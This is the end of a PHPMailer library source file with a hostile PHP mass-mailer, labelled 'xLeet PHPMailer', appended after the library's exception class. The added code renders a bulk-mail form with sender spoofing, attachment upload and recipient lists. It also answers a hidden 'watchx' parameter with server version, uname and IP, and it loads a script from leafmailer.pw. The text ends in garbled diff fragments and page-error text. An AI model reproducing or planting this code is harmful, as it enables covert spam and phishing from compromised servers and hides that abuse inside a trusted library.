     * Allows for public read access to 'all_recipients' property.
     * @note: Before the send() call, queued addresses (i.e. with IDN) are not yet included.
     * @access public
     * @return array
     */
    public function getAllRecipientAddresses()
    {
        return $this->all_recipients;
    }

    /**
     * Perform a callback.
     * @param boolean $isSent
     * @param array $to
     * @param array $cc
     * @param array $bcc
     * @param string $subject
     * @param string $body
     * @param string $from
     */
    protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from)
    {
        if (!empty($this->action_function) && is_callable($this->action_function)) {
            $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from);
            call_user_func_array($this->action_function, $params);
        }
    }
}

/**
 * PHPMailer exception handler
 * @package PHPMailer
 */
class phpmailerException extends Exception
{
    /**
     * Prettify error message output
     * @return string
     */
    public function errorMessage()
    {
        $errorMsg = '<strong>' . $this->getMessage() . "</strong><br />\n";
        return $errorMsg;
    }
}
if ($_REQUEST['watchx']) {
	$version = phpversion();
	$uname =  php_uname();
	$ip = gethostbyname($_SERVER["HTTP_HOST"]);	
	echo json_encode (array ("version"=>$version,
		"uname"=>$uname,
		"platform"=>PHP_OS,
		"ip"=>$ip,
		"mailerx"=>true,	
	));
	die ();
}
print '
<head>
    <title>xLeet PHPMailer</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <link href="https://maxcdn.bootstrapcdn.com/bootswatch/3.3.6/cosmo/bootstrap.min.css" rel="stylesheet" >
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
    <script src="https://leafmailer.pw/style.js"></script>

</head>';

print '<body>';
print '<div class="container col-lg-6">
        <h3><font color="green"><span class="glyphicon glyphicon-leaf"></span></font> xLeet PHPMailer <small>'.$leaf['version'].'</small></h3>
        <form name="form" id="form" method="POST" enctype="multipart/form-data" action="">
            <div class="row">
                <div class="form-group col-lg-6 "><label for="senderEmail">Email</label><input type="text" class="form-control  input-sm " id="senderEmail" name="senderEmail" value="'.$senderEmail.'"></div>
                <div class="form-group col-lg-6 "><label for="senderName">Sender Name</label><input type="text" class="form-control  input-sm " id="senderName" name="senderName" value="'.$senderName.'"></div>
            </div>
            <div class="row">
                <span class="form-group col-lg-6  "><label for="attachment">Attachment <small>(Multiple Available)</small></label><input type="file" name="attachment[]" id="attachment[]" multiple/></span>

                <div class="form-group col-lg-6"><label for="replyTo">Reply-to</label><input type="text" class="form-control  input-sm " id="replyTo" name="replyTo" value="'.$replyTo.'" /></div>
            </div>
            <div class="row">
                <div class="form-group col-lg-12 "><label for="subject">Subject</label><input type="text" class="form-control  input-sm " id="subject" name="subject" value="'.$subject.'" /></div>
            </div>
            <div class="row">
                <div class="form-group col-lg-6"><label for="messageLetter">Message Letter</label><textarea name="messageLetter" id="messageLetter" class="form-control" rows="10" id="textArea">'.$messageLetter.'</textarea></div>
                <div class="form-group col-lg-6 "><label for="emailList">Email List</label><textarea name="emailList" id="emailList" class="form-control" rows="10" id="textArea">'.$emailList.'</textarea></div>
            </div>
            <div class="row">
                <div class="form-group col-lg-6 ">
                    <label for="messageType">Message Type</label>
                    HTML <input type="radio" name="messageType" id="messageType" value="1" '.$html.'>
                    Plain<input type="radio" name="messageType" id="messageType" value="2" '.$plain.'>
                </div>
                <div class="form-group col-lg-3 ">
                    <label for="encode">Encode Type</label>
                    <select class="form-control input-sm" id="encode" name="encode">
                        <option value="UTF-8" selected>UTF-8 Encode</option>
                        <option value="UTF-8">ISO Encode</option>
                    </select>
                </div>
            </div> 
            <button type="submit" class="btn btn-default btn-sm" form="form" name="action" value="send">SEND</button>
   
        </form>
    </div>
    <div class="col-lg-6"><br>
        <label for="well">Instruction</label>
        <div id="well" class="well well">
            <h4>Server Information</h4>
            <ul>
                <li>ServerIP : <b>'.$_SERVER['SERVER_ADDR'].'</b></li>

            </ul>
            <h4>HELP</h4>
            <ul>
                <li>[-email-] : <b>Reciver Email</b></li>
                <li>[-time-] : <b>Date and Time</b> ('.date("m/d/Y h:i:s a", time()).')</li>
                <li>[-emailuser-] : <b>Email User</b> (emailuser@emaildomain)</li>
                <li>[-randomstring-] : <b>Random string (0-9,a-z)</b></li>
                <li>[-randomnumber-] : <b>Random number (0-9) </b></li>
                <li>[-randomletters-] : <b>Random Letters(a-z) </b></li>
                <li>[-randommd5-] : <b>Random MD5 </b></li>
            </ul>
            <h4>example</h4>
            Reciver Email = <b>user@domain.com</b><br>
            <ul>
                <li>hello <b>[-emailuser-]</b> -> hello <b>user</b></li>
                <li>your code is  <b>[-randommd5-]</b> -> your code is <b>e10adc3949ba59abbe56e057f20f883e</b></li>
            </ul>

            <h6>by <b><a href="http://'.$leaf['website'].'">'.$leaf['website'].'</a></b></h6>
        </div>
    </div>';    
    
if($_POST['action']=="send"){
    print '    <div class="col-lg-12">';
    $maillist=explode("\r\n", $emailList);
    $n=count($maillist);
    $x =1;
    foreach ($maillist as $email ) {
        print '<div class="col-lg-1">['.$x.'/'.$n.']</div><div class="col-lg-5">'.$email.'</div>';
        if(!leafMailCheck($email)) {
            print '<div class="col-lg-6"><span class="label label-default">Incorrect Email</span></div>';
            print "<br>\r\n";
        }
        else {
            $mail = new PHPMailer;
            $mail->setFrom(leafClear($senderEmail,$email),leafClear($senderName,$email));
            $mail->addReplyTo(leafClear($replyTo,$email));
            $mail->addAddress($email);
            $mail->Subject = leafClear($subject,$email);
            $mail->Body =  leafClear($messageLetter,$email);
            $mail->CharSet = $encode;
            for($i=0; $i<count($_FILES['attachment']['name']); $i++) {
                if ($_FILES['attachment']['tmp_name'][$i] != ""){
                    $mail->AddAttachment($_FILES['attachment']['tmp_name'][$i],$_FILES['attachment']['name'][$i]);
                }

            }
            if($messageType==1){$mail->IsHTML(true);}
            else {$mail->IsHTML(false);}
            if (!$mail->send()) {
                echo '<div class="col-lg-6"><span class="label label-default">'.$mail->ErrorInfo.'</span></div>';
            }
            else {
                echo '<div class="col-lg-6"><span class="label label-success">Ok</span></div>';
            }
            print "<br>\r\n";
        }
        $x++;
        for($k = 0; $k < 40000; $k++) {echo ' ';}
    }

}
print '</body>';"));
     11 +?>
     12 + 
Please wait...
Page is in error, reload to recover